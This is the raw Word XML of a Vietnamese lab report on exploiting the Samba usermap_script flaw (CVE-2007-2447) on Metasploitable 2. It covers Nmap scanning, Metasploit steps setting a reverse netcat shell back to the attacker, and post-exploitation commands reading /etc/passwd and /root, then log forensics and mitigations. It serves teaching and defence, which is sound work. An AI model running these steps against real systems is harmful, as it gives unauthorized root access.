    <w:p w14:paraId="40ABA5F7" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="002708A8">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4.1. Q</w:t>
      </w:r>
      <w:r>
        <w:t>uét dịch vụ bằng Nmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140ADA43" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="002708A8">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Thực hiện quét để tìm các dịch vụ đang mở, đặc biệt cổng 139 và 445 (Samba/SMB):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F63F488" w14:textId="00814957" w:rsidR="00174668" w:rsidRDefault="002708A8">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -sS -sV </w:t>
      </w:r>
      <w:r w:rsidR="005A15EB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>[victim ip]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A90E73" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="002708A8">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Kết quả cho thấy dịch vụ Samba đang chạy, thường là phiên bản 3.0.20 hoặc tương tự – phiên bản bị ảnh hưởng bởi lỗ hổng usermap_script.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489C3428" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="002708A8">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4.2. Khai thác bằng Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B89CF54" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="002708A8">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Khởi động Metasploit và tìm module khai thác:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E39976" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="002708A8">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16833CCE" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="002708A8">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>search samba usermap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C064C1" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="002708A8">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>use exploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/multi/samba/usermap_script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E6299D" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="002708A8">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D73C4A" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="002708A8">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Cấu hình mục tiêu và payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A30849B" w14:textId="09B00831" w:rsidR="00174668" w:rsidRDefault="002708A8">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">set RHOSTS </w:t>
      </w:r>
      <w:r w:rsidR="005A15EB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>[victim ip]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025BD7BF" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="002708A8">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>set PAYLOAD cmd/unix/reverse_netcat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18707F06" w14:textId="7EA42D2B" w:rsidR="00174668" w:rsidRDefault="002708A8">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">set LHOST </w:t>
      </w:r>
      <w:r w:rsidR="005A15EB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>[attack ip]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC5CB58" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="002708A8">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>set LPORT 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7516C85B" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="002708A8">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06113FA7" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="002708A8">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC38F0E" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="002708A8">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Sau khi chạy lệnh exploit (hoặc run), Metasploit thiết lập kết nối ngược và mở session shell trên máy mục tiêu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F53FE6E" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="002708A8">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4.3. Xác minh quyền và post-exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24547C7B" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="002708A8">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Sau khi có shell, thực hiện các lệnh để xác nhận quyền và thu thập thông tin:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58384F34" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="002708A8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – kiểm tra quyền h</w:t>
      </w:r>
      <w:r>
        <w:t>iện tại (thường là root).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0343538A" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="002708A8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ls -la</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – liệt kê thư mục.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E879D9" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="002708A8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ifconfig</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – xem thông tin mạng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199753D3" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="002708A8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cat /etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – xem danh sách người dùng hệ thống.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7795E6" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="002708A8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cat /etc/issue</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – xem phiên bản hệ điều hành.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FBE8700" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="002708A8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ls -la /root/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – kiểm tra thư mục root.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4DDACC" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="002708A8">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Kết quả xác nhận đã chiếm được quyền root trên máy Metasploitable 2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CFAF1B" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="002708A8">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>5. PHÂN TÍCH PHÁP Y (FORENSICS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7D8755" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="002708A8">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Trên máy victim (Metasploitable 2), kiểm tra log Samba và log hệ thống:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70BDB0A0" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="002708A8">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cat /var/log/samba/log.smbd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382DE7C8" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="002708A8">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cat /var/log/syslog</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5421AEA9" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="002708A8">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vì máy tấn công không sử dụng biện </w:t>
      </w:r>
      <w:r>
        <w:t>pháp che giấu (spoofing, proxy…), log trên máy victim dễ dàng ghi nhận thông tin về địa chỉ IP máy tấn công (192.168.1.16), thời điểm kết nối và các hoạt động liên quan đến Samba. Đây là dấu vết quan trọng để truy vết nguồn gốc cuộc tấn công.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B365C6B" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="002708A8">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6. GIẢI PHÁP </w:t>
      </w:r>
      <w:r>
        <w:t>VÀ BIỆN PHÁP GIẢM THIỂU</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F84323C" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="002708A8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Nâng cấp Samba lên phiên bản 3.0.25 hoặc cao hơn – lỗ hổng được vá từ phiên bản này trở đi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D881EEE" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="002708A8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Nếu không thể nâng cấp ngay: xóa hoặc vô hiệu hóa mọi shell script bên ngoài trong smb.conf (username map script, lệnh thêm máy in, lệnh quả</w:t>
      </w:r>
      <w:r>
        <w:t>n lý file share…).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A178953" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="002708A8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Giới hạn quyền truy cập mạng tới server Samba: chỉ cho phép các IP/trusted host kết nối; chặn cổng 137, 139, 445 nếu không cần thiết.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13FBE82E" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="002708A8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>Cấu hình bảo mật Samba theo khuyến cáo: hạn chế anonymous, hạn chế script không cần thiết, kiểm soát ch</w:t>
      </w:r>
      <w:r>
        <w:t>ặt các chức năng RPC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4206FAF0" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="002708A8">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>7. KẾT LUẬN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D594F1" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="002708A8">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Thực nghiệm đã thành công khai thác lỗ hổng Samba usermap_script (CVE-2007-2447) trên Metasploitable 2, chiếm được shell với quyền root mà không cần xác thực. Module Metasploit exploit/multi/samba/usermap_script hoạt động </w:t>
      </w:r>
      <w:r>
        <w:t>ổn định và nhanh chóng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBFAD87" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="002708A8">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Kết quả khẳng định mức độ nguy hiểm của việc sử dụng phần mềm cũ và cấu hình không an toàn (username map script). Phân tích pháp y cho thấy log hệ thống ghi nhận rõ ràng nguồn tấn công khi không có biện pháp che giấu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2070F4ED" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="002708A8">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Biện pháp quan</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> trọng nhất là nâng cấp Samba và vô hiệu hóa các script không cần thiết trong cấu hình. Báo cáo mang tính chất học thuật và thực nghiệm trong môi trường lab cách ly. Mọi hành vi tấn công hệ thống thật mà không được phép đều là hành vi bất hợp pháp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2870FC9E" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="002708A8">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>TÀI LIỆ</w:t>
      </w:r>
      <w:r>
        <w:t>U THAM KHẢO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11980F0B" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="002708A8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Samba Official Security Advisory – CVE-2007-2447. https://www.samba.org/samba/security/CVE-2007-2447.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1185E414" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="002708A8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>NVD – CVE-2007-2447. https://nvd.nist.gov/vuln/detail/CVE-2007-2447</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588B86E4" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="002708A8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Rapid7 Metasploit Module – exploit/multi/samba/usermap_script.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC2B86F" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="002708A8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>CERT Co</w:t>
      </w:r>
      <w:r>
        <w:t>ordination Center – Vulnerability Note.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782A71D5" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="002708A8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>Tenable, SUSE, Debian, Red Hat – Security Advisories cho CVE-2007-2447.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5DEDCB" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="00174668">
      <w:pPr>
        <w:spacing w:before="400"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F5FCB33" w14:textId="2FDD9372" w:rsidR="00174668" w:rsidRDefault="00174668">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00174668">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ECDE1" w14:textId="77777777" w:rsidR="002708A8" w:rsidRDefault="002708A8">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="6BB1A7A5" w14:textId="77777777" w:rsidR="002708A8" w:rsidRDefault="00270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077E8" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="002708A8">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203CB1">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203CB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F4907" w14:textId="77777777" w:rsidR="002708A8" w:rsidRDefault="002708A8">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="38DBC5E4" w14:textId="77777777" w:rsidR="002708A8" w:rsidRDefault="00270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60E8" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="002708A8">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0853"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="22883ABE"/>
    <w:lvl w:ilvl="0" w:tplc="00D443F8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="[%1]"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="0A4A2F36">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="B9127FDC">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="7BF84872">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="A5A8D208">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="106E897C">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="BF9EC132">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="24228836">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="16147CFE">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="101F20E6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="94B69DAA"/>
    <w:lvl w:ilvl="0" w:tplc="1F36C4EA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="B866D29C">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="69206948">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="475A9804">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="39C24D9A">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="9E78DF82">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="3C82B310">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="D904F144">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="401AAFD6">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
